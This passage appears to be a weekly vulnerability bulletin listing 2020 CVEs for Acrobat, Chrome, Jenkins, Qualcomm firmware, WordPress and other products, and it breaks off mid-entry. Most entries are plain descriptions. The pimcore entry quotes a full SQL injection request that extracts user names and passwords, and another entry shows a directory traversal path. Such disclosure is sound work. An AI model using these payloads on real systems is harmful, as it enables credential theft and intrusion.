adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 4.3 CVE-2020-24426
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-11-05 6.8 CVE-2020-24437
MISC
MISC
adobe — acrobat Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document. 2020-11-05 6.8 CVE-2020-24436
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader. 2020-11-05 6.8 CVE-2020-24435
MISC
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document. 2020-11-05 6.8 CVE-2020-24432
MISC
adobe — acrobat Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file. 2020-11-05 6.8 CVE-2020-24430
MISC
basercms — basercms baserCMS before version 4.4.1 is affected by Remote Code Execution (RCE). Code may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The Edit template component is vulnerable. The issue is fixed in version 4.4.1. 2020-10-30 6.5 CVE-2020-15277
MISC
MISC
CONFIRM
google — chrome Use after free in Mojo in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15997
MISC
MISC
google — chrome Insufficient policy enforcement in networking in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15992
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in printing in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15993
MISC
MISC
google — chrome Out of bounds write in V8 in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15995
MISC
MISC
google — chrome Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16006
SUSE
SUSE
MISC
MISC
google — chrome Use after free in passwords in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15996
MISC
MISC
google — chrome Insufficient policy enforcement in ANGLE in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16005
SUSE
SUSE
MISC
MISC
google — chrome Use after free in USB in Google Chrome prior to 86.0.4240.99 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15998
MISC
MISC
google — chrome Inappropriate implementation in Blink in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16000
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in media in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16001
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in PDFium in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. 2020-11-03 6.8 CVE-2020-16002
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in user interface in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16004
SUSE
SUSE
MISC
MISC
google — chrome Use after free in autofill in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15990
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient data validation in dialogs in Google Chrome on OS X prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from disk via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15977
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in password manager in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15991
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in printing in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16003
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient policy enforcement in downloads in Google Chrome on Windows prior to 86.0.4240.75 allowed a remote attacker who convinced the user to open files to execute arbitrary code via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15988
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Inappropriate implementation in cache in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15982
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15999
SUSE
MISC
MISC
FEDORA
google — chrome Heap buffer overflow in UI in Google Chrome on Android prior to 86.0.4240.185 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16010
MISC
MISC
google — chrome Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15979
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Inappropriate implementation in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15985
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient policy enforcement in Omnibox in Google Chrome on iOS prior to 86.0.4240.75 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted URL. 2020-11-03 4.3 CVE-2020-15984
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Integer overflow in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to bypass site isolation via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15974
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Integer overflow in media in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15986
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Out of bounds read in audio in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. 2020-11-03 4.3 CVE-2020-15981
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Inappropriate implementation in networking in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to perform domain spoofing via a crafted HTML page. 2020-11-03 4.3 CVE-2020-6557
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-16009
SUSE
SUSE
MISC
MISC
google — chrome Insufficient data validation in webUI in Google Chrome on ChromeOS prior to 86.0.4240.75 allowed a local attacker to bypass content security policy via a crafted HTML page. 2020-11-03 4.4 CVE-2020-15983
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in V8 in Google Chrome prior to 86.0.4240.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15994
MISC
MISC
google — chrome Integer overflow in SwiftShader in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15975
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Use after free in WebXR in Google Chrome on Android prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15976
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient data validation in navigation in Google Chrome on Android prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. 2020-11-03 6.8 CVE-2020-15978
SUSE
MISC
MISC
FEDORA
FEDORA
ibm — i2_ibase IBM i2 iBase 8.9.13 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. IBM X-Force ID: 184579. 2020-10-30 6.8 CVE-2020-4588
XF
CONFIRM
ibm — i2_ibase IBM i2 iBase 8.9.13 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 184574. 2020-10-30 5 CVE-2020-4584
XF
CONFIRM
icewarp — mail_server IceWarp 11.4.5.0 allows XSS via the language parameter. 2020-11-02 4.3 CVE-2020-27982
MISC
jenkins — active_directory A cross-site request forgery (CSRF) vulnerability in Jenkins Active Directory Plugin 2.19 and earlier allows attackers to perform connection tests, connecting to attacker-specified or previously configured Active Directory servers using attacker-specified credentials. 2020-11-04 4.3 CVE-2020-2303
MLIST
CONFIRM
jenkins — active_directory A missing permission check in Jenkins Active Directory Plugin 2.19 and earlier allows attackers with Overall/Read permission to access the domain health check diagnostic page. 2020-11-04 4 CVE-2020-2302
CONFIRM
jenkins — aws_global_configuration A missing permission check in Jenkins AWS Global Configuration Plugin 1.5 and earlier allows attackers with Overall/Read permission to replace the global AWS configuration. 2020-11-04 4 CVE-2020-2311
CONFIRM
jenkins — azure_key_vault A missing permission check in Jenkins Azure Key Vault Plugin 2.0 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2020-11-04 4 CVE-2020-2313
CONFIRM
jenkins — kubernetes A missing permission check in Jenkins Kubernetes Plugin 1.27.3 and earlier allows attackers with Overall/Read permission to list global pod template names. 2020-11-04 4 CVE-2020-2308
CONFIRM
jenkins — kubernetes A missing/An incorrect permission check in Jenkins Kubernetes Plugin 1.27.3 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2020-11-04 4 CVE-2020-2309
CONFIRM
jenkins — mercurial A missing permission check in Jenkins Mercurial Plugin 2.11 and earlier allows attackers with Overall/Read permission to obtain a list of names of configured Mercurial installations. 2020-11-04 4 CVE-2020-2306
CONFIRM
marmind — marmind A Stored Cross-Site Scripting (XSS) vulnerability in the “Marmind” web application with version 4.1.141.0 allows an attacker to inject code that will later be executed by legitimate users when they open the assets containing the JavaScript code. This would allow an attacker to perform unauthorized actions in the application on behalf of legitimate users or spread malware via the application. By using the “Assets Upload” function, an attacker can abuse the upload function to upload a malicious PDF file containing a stored XSS. 2020-11-05 4.3 CVE-2020-26505
MISC
MISC
oleacorner — olea_gift_on_order The Module Olea Gift On Order module through 5.0.8 for PrestaShop enables an unauthenticated user to read arbitrary files on the server via getfile.php?file=/.. directory traversal. 2020-11-02 5 CVE-2020-9368
MISC
MISC
pimcore — pimcore The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{“keyId”%3a”””,”groupId”%3a”‘asd’))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,”,11,12,”,14+from+users)+–+”}] 2020-10-30 6.5 CVE-2020-7759
CONFIRM
CONFIRM
qnap — music_station If exploited, this cross-site scripting vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11. 2020-11-02 4.3 CVE-2018-19951
CONFIRM
qnap — music_station If exploited, this SQL injection vulnerability could allow remote attackers to obtain application information. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.1.13; versions prior to 5.2.9; versions prior to 5.3.11. 2020-11-02 5 CVE-2018-19952
CONFIRM
qnap — photo_station The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. 2020-11-02 4.3 CVE-2018-19956
CONFIRM
qnap — photo_station The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. 2020-11-02 4.3 CVE-2018-19955
CONFIRM
qnap — photo_station The cross-site scripting vulnerability has been reported to affect earlier versions of Photo Station. If exploited, the vulnerability could allow remote attackers to inject malicious code. This issue affects: QNAP Systems Inc. Photo Station versions prior to 5.7.11; versions prior to 6.0.10. 2020-11-02 4.3 CVE-2018-19954
CONFIRM
qualcomm — agatti_firmware u’Array index underflow issue in adsp driver due to improper check of channel id before used as array index.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8953, MSM8996AU, QCA6390, QCA9531, QCM2150, QCS404, QCS405, QCS605, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 4.6 CVE-2020-11174
CONFIRM
MISC
qualcomm — agatti_firmware u’An Unaligned address or size can propagate to the database due to improper page permissions and can lead to improper access control’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Agatti, Bitra, Kamorta, QCA6390, QCS404, QCS610, Rennell, SA515M, SC7180, SC8180X, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130 2020-11-02 4.6 CVE-2020-3638
CONFIRM
MISC
qualcomm — agatti_firmware u’A buffer overflow could occur if the API is improperly used due to UIE init does not contain a buffer size a param’ in Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Agatti, Kamorta, QCS404, QCS605, SDA845, SDM670, SDM710, SDM845, SXR1130 2020-11-02 4.6 CVE-2020-3678
CONFIRM
MISC
qualcomm — agatti_firmware u’Potential out of bounds read while processing downlink NAS transport message due to improper length check of Information Element(IEI) NAS message container’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9205, MDM9206, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCM2150, QCM6125, QCS605, QCS610, QM215, Rennell, SA415M, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SXR1130 2020-11-02 6.4 CVE-2020-3670
CONFIRM
MISC
qualcomm — agatti_firmware u’QSEE reads the access permission policy for the SMEM TOC partition from the SMEM TOC contents populated by XBL Loader and applies them without validation’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8098, Bitra, IPQ6018, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9650, MSM8905, MSM8998, Nicobar, QCA6390, QCS404, QCS405, QCS605, QCS610, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 4.6 CVE-2020-3684
CONFIRM
MISC
qualcomm — agatti_firmware u’Out of bound access can happen in MHI command process due to lack of check of channel id value received from MHI devices’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9150, MDM9607, MDM9650, MSM8905, MSM8917, MSM8953, Nicobar, QCA6390, QCA9531, QCM2150, QCS404, QCS405, QCS605, QCS610, QM215, QRB5165, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM660, SDM670, SDM710, SDM845, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130 2020-11-02 4.6 CVE-2020-11125
CONFIRM
MISC
qualcomm — agatti_firmware u’Two threads running simultaneously from user space can lead to race condition in fastRPC driver’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8053, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9607, MSM8953, Nicobar, QCA6390, QCS404, QCS405, QCS610, Rennell, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM632, SDM660, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130 2020-11-02 4.4 CVE-2020-11173
CONFIRM
MISC
qualcomm — apq8009_firmware u’Use after free while installing new security rule in ipcrtr as old one is deleted and this rule could still be in use for checking security permission for particular process’ in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8996AU, QCA4531, QCA6574AU, QCA9531, QCM2150, QCS605, SDM429W, SDX20, SDX24 2020-11-02 4.6 CVE-2020-3696
CONFIRM
MISC
qualcomm — apq8009_firmware u’Use out of range pointer issue can occur due to incorrect buffer range check during the execution of qseecom.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8098, Bitra, MSM8909W, MSM8996AU, Nicobar, QCM2150, QCS605, Saipan, SDM429W, SDX20, SM6150, SM8150, SM8250, SXR2130 2020-11-02 4.6 CVE-2020-3693
CONFIRM
MISC
qualcomm — apq8009_firmware u’Buffer over-read issue in Bluetooth estack due to lack of check for invalid length of L2cap configuration request received from peer device.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, SA415M, SA515M, SC8180X, SDX55, SM8250 2020-11-02 4.8 CVE-2020-11141
CONFIRM
MISC
qualcomm — apq8009_firmware u’Buffer over-read while processing received L2CAP packet due to lack of integer overflow check’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8053, QCA6390, QCN7605, QCN7606, SA415M, SA515M, SA6155P, SA8155P, SC8180X, SDX55 2020-11-02 6.4 CVE-2020-11169
CONFIRM
MISC
qualcomm — apq8053_firmware u’Lack of handling unexpected control messages while encryption was in progress can terminate the connection and thus leading to a DoS’ in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8053, APQ8076, MDM9640, MDM9650, MSM8905, MSM8917, MSM8937, MSM8940, MSM8953, QCA6174A, QCA9886, QCM2150, QM215, SDM429, SDM439, SDM450, SDM632 2020-11-02 5 CVE-2020-11157
CONFIRM
qualcomm — bitra_firmware u’Use out of range pointer issue can occur due to incorrect buffer range check during the execution of qseecom’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Mobile, Snapdragon Voice & Music in Bitra, Nicobar, Saipan, SM6150, SM8150, SM8250, SXR2130 2020-11-02 4.6 CVE-2020-3694
CONFIRM
MISC
qualcomm — qca6390_firmware u’Buffer over-read issue in Bluetooth estack due to lack of check for invalid length of L2cap packet received from peer device.’ in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking in QCA6390, QCN7605, QCS404, SA415M, SA515M, SC8180X, SDX55, SM8250 2020-11-02 4.8 CVE-2020-11156
CONFIRM
MISC
trendmicro — antivirus Trend Micro Antivirus for Mac 2020 (Consumer) contains a race condition vulnerability in the Web Threat Protection Blocklist component, that if exploited, could allow an attacker to case a kernel panic or crash.nnrnAn attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. 2020-10-30 6.9 CVE-2020-27014
N/A
N/A
wordpress — wordpress WordPress before 5.5.2 allows CSRF attacks that change a theme’s background image. 2020-11-02 4.3 CVE-2020-28040
MISC
MLIST
MISC
DEBIAN
wordpress — wordpress WordPress before 5.5.2 allows stored XSS via post slugs. 2020-11-02 4.3 CVE-2020-28038
MISC
MLIST
MISC
DEBIAN
wordpress — wordpress WordPress before 5.5.2 allows XSS associated with global variables. 2020-11-02 4.3 CVE-2020-28034
MLIST
MISC
DEBIAN
wordpress — wordpress WordPress before 5.5.2 mishandles embeds from disabled sites on a multisite network, as demonstrated by allowing a spam embed. 2020-11-02 5 CVE-2020-28033
MLIST
MISC
DEBIAN
wordpress — wordpress is_protected_meta in wp-includes/meta.php in WordPress before 5.5.2 allows arbitrary file deletion because it does not properly determine whether a meta key is considered protected. 2020-11-02 6.4 CVE-2020-28039
MISC
MLIST
MISC
MISC
DEBIAN
zte — zxa10_eodn_firmware A ZTE product is impacted by an information leak vulnerability. An attacker could use this vulnerability to obtain the authentication password of the handheld terminal and access the device illegally for operation. This affects: ZXA10 eODN V2.3P2T1 2020-11-05 4 CVE-2020-6877
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
basercms — basercms baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. The issue affects the following components: Edit feed settings, Edit widget area, Sub site new registration, New category registration. Arbitrary JavaScript may be executed by entering specific characters in the account that can access the file upload function category list, subsite setting list, widget area edit, and feed list on the management screen. The issue was introduced in version 4.0.0. It is fixed in version 4.4.1. 2020-10-30 3.5 CVE-2020-15273
MISC
CONFIRM
MISC
basercms — basercms baserCMS before version 4.4.1 is vulnerable to Cross-Site Scripting. Arbitrary JavaScript may be executed by entering a crafted nickname in blog comments. The issue affects the blog comment component. It is fixed in version 4.4.1. 2020-10-30 3.5 CVE-2020-15276
MISC
MISC
CONFIRM
evms — redcap A cross-site scripting (XSS) issue in REDCap 8.11.6 through 9.x before 10 allows attackers to inject arbitrary JavaScript or HTML in the Messenger feature. It was found that the filename of the image or file attached in a message could be used to perform this XSS attack. A user could craft a message and send it to anyone on the platform including admins. The XSS payload would execute on the other account without interaction from the user on several pages. 2020-11-02 3.5 CVE-2020-27359
MISC
MISC
MISC
nedi — nedi NeDi 1.9C allows inc/rt-popup.php d XSS. 2020-11-02 3.5 CVE-2020-23868
MISC
nedi — nedi NeDi 1.9C allows pwsec.php oid XSS. 2020-11-02 3.5 CVE-2020-23989
MISC
trendmicro — antivirus Trend Micro Antivirus for Mac 2020 (Consumer) contains an Error Message Information Disclosure vulnerability that if exploited, could allow kernel pointers and debug messages to leak to userland. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. 2020-10-30 2.1 CVE-2020-27015
N/A
N/A

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — acrobat_reader_dc
 
Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process. 2020-11-05 not yet calculated CVE-2020-24439
MISC
alerta — alerta
 
In Alerta before version 8.1.0, users may be able to bypass LDAP authentication if they provide an empty password when Alerta server is configure to use LDAP as the authorization provider. Only deployments where LDAP servers are configured to allow unauthenticated authentication mechanism for anonymous authorization are affected. A fix has been implemented in version 8.1.0 that returns HTTP 401 Unauthorized response for any authentication attempts where the password field is empty. As a workaround LDAP administrators can disallow unauthenticated bind requests by clients. 2020-11-06 not yet calculated CVE-2020-26214
MISC
MISC
MISC
CONFIRM
MISC
MISC
apache — shiro
 
Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass. 2020-11-05 not yet calculated CVE-2020-17510
MLIST
MISC
aruba — airwave_software
 
A remote execution of arbitrary commands vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-11-04 not yet calculated CVE-2020-7129
MISC
aruba — airwave_software
 
A remote unauthenticated arbitrary code execution vulnerability was discovered in Aruba Airwave Software version(s): Prior to 1.3.2. 2020-11-04 not yet calculated CVE-2020-7128
MISC
asterisk — asterisk_open_source
 
A res_pjsip_session crash was discovered in Asterisk Open Source 13.x before 13.37.1, 16.x before 16.14.1, 17.x before 17.8.1, and 18.x before 18.0.1. and Certified Asterisk before 16.8-cert5. Upon receiving a new SIP Invite, Asterisk did not return the created dialog locked or referenced. This caused a gap between the creation of the dialog object, and its next use by the thread that created it. Depending on some off-nominal circumstances and timing, it was possible for another thread to free said dialog in this gap. Asterisk could then crash when the dialog object, or any of its dependent objects, were dereferenced or accessed next by the initial-creation thread. Note, however, that this crash can only occur when using a connection-oriented protocol (e.g., TCP or TLS, but not UDP) for SIP transport. Also, the remote client must be authenticated, or Asterisk must be configured for anonymous calling. 2020-11-06 not yet calculated CVE-2020-28327
MISC
asterisk — asterisk_open_source
 
An issue was discovered in Asterisk Open Source 13.x before 13.37.1, 16.x before 16.14.1, 17.x before 17.8.1, and 18.x before 18.0.1 and Certified Asterisk before 16.8-cert5. If Asterisk is challenged on an outbound INVITE and the nonce is changed in each response, Asterisk will continually send INVITEs in a loop. This causes Asterisk to consume more and more memory since the transaction will never terminate (even if the call is hung up), ultimately leading to a restart or shutdown of Asterisk. Outbound authentication must be configured on the endpoint for this to occur. 2020-11-06 not yet calculated CVE-2020-28242
MISC
audimexee — audimexee
 
AudimexEE before 14.1.1 is vulnerable to Reflected XSS (Cross-Site-Scripting). If the recommended security configuration parameter “unique_error_numbers” is not set, remote attackers can inject arbitrary web script or HTML via ‘action, cargo, panel’ parameters that can lead to data leakage. 2020-11-05 not yet calculated CVE-2020-28047
MISC
audimexee — audimexee
 
SQL Injection vulnerability in “Documents component” found in AudimexEE version 14.1.0 allows an attacker to execute arbitrary SQL commands via the object_path parameter. 2020-11-05 not yet calculated CVE-2020-28115
MISC
auth0 — ad-idap-connector
 
